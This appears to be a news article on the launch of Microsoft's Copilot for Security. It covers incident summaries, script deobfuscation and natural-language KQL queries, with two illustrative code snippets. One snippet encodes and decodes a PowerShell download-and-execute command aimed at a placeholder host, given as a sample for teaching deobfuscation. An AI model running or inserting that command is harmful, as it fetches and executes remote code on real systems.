Microsoft has announced that its AI security assistant, Copilot for Security, will be generally available starting April 1, 2024, promising to streamline the workflows of cyber professionals.
The assistant will help security analysts triage, classify, and remediate cyber incidents, and is integrated across Microsoft's security portfolio.
Copilot for Security offers incident summary features that prevent analysts from getting bogged down in time-consuming documentation steps.
During a conference call, Andrew Conway, Microsoft's vice president of security marketing, said that, like developers, security analysts tend not to enjoy mundane tasks like generating summaries and reports because they take them away from higher-level, more stimulating investigative work.
Microsoft claims that Copilot for Security can perform these documentation tasks 46% faster than its human counterparts, and with greater accuracy too.
Another problem for security analysts, especially those who are less experienced, is manually reverse engineering malicious scripts. Threat actors often obfuscate the scripts used in their attacks to hide their tactics, techniques, and intentions.
Typically, threat analysts would manually reverse engineer the obfuscated script to understand how the attack works, but with talent shortages affecting security teams around the world, it is difficult to find personnel who can do this reliably, effectively, and efficiently, the company said.
Copilot for Security, by contrast, can translate the code and provide a natural language explanation of the entire script, breaking down what each individual piece of code does.
Microsoft hopes the tool can help companies address their skills shortage issues by giving less experienced junior analysts actionable insights into an individual script, without the arduous manual process of reverse engineering.
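To give a concrete sense of the manual work being described, the sketch below walks through one simplified, hypothetical layer of deobfuscation: decoding a Base64-encoded PowerShell command of the kind an analyst might pull from a process log. It illustrates the general technique only; it is not a description of Copilot's internals, and the payload is invented for the example.

```python
# Illustrative only: a simplified, hypothetical example of the manual
# deobfuscation work described above. Real malicious scripts usually layer
# several techniques (string splitting, XOR, compression) on top of this.
import base64

# Invented sample: PowerShell's -EncodedCommand expects Base64 over UTF-16LE.
encoded_payload = base64.b64encode(
    'IEX (New-Object Net.WebClient).DownloadString("http://example.com/x.ps1")'
    .encode("utf-16-le")
).decode("ascii")


def decode_powershell_payload(payload: str) -> str:
    """Reverse the -EncodedCommand encoding: Base64 wrapping UTF-16LE text."""
    return base64.b64decode(payload).decode("utf-16-le")


decoded = decode_powershell_payload(encoded_payload)
print(decoded)
# The analyst then reads the decoded command to work out intent: here,
# downloading a remote script and executing it in memory.
```

In the article's framing, Copilot performs this kind of translation and explains each step in natural language, so a junior analyst does not need to know the encoding tricks in advance.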
Mario Ferket, CISO at chemical company Dow, said he has seen improvements in the time it takes junior analysts to “get up to speed” when testing Copilot for Security.
“We recently hired some junior analysts and what we've seen is that to get those people up to speed, with Copilot, the speed is tremendous,” he explained.
“If you want to create a complex KQL script, you can now use natural language. This levels the playing field because, in the past, junior analysts would have needed help from senior analysts to do that type of work.”
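As a rough illustration of the natural-language-to-KQL workflow Ferket describes, the sketch below pairs a hypothetical analyst request with the kind of Kusto Query Language (KQL) query it corresponds to. Both the prompt and the query are invented for illustration against Microsoft Sentinel's standard SigninLogs table; neither is Copilot output.

```python
# Illustrative only: a hypothetical natural-language request and a
# hand-written KQL query expressing the same question. Neither string is
# Copilot output; both are assumptions for illustration.
analyst_prompt = (
    "Show me the accounts with the most failed sign-ins over the last 24 hours."
)

# Equivalent query against the standard Microsoft Sentinel SigninLogs table.
equivalent_kql = """
SigninLogs
| where TimeGenerated > ago(24h)
| where ResultType != "0"   // non-zero ResultType values indicate failures
| summarize FailedSignIns = count() by UserPrincipalName
| order by FailedSignIns desc
| take 10
"""

print(analyst_prompt)
print(equivalent_kql)
```

The point of Ferket's example is that writing queries like this by hand is the part that previously required a senior analyst's help.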
Copilot for Security will help take back the advantage from threat actors
The assistant also uses AI-based analytics to assess the potential scope of security incidents. The system will provide a holistic impact analysis with information on the specific systems affected by an attack.
Security professionals will be able to generate impact analyses for each individual incident, as well as receive practical step-by-step guidance on how they should respond to an attack, including support with classification, containment, and remediation.
Additionally, Microsoft will allow customers to create and save their own natural language prompts for their most frequent workflows.
In its testing, Microsoft found that experienced security analysts using Copilot were 22% faster at common security tasks, while increasing their accuracy by 7%.
Additionally, 97% of experienced security analysts said they wanted to use Copilot again, and Microsoft highlighted that AI has the potential to improve not only an individual's work but also their job satisfaction, by taking care of many of the mundane tasks that might normally frustrate them.
With Copilot for Security, Microsoft has demonstrated its confidence in the ability of AI to bring measurable improvements to security operations in companies around the world.
Conway said he believes AI is starting to turn the tables on threat actors, allowing defenders to take back the advantage in the digital arms race.
“Security has become the most serious use case for AI right now… Organizations have traditionally faced a disadvantage against threat actors, but now they can use AI to gain the advantage.”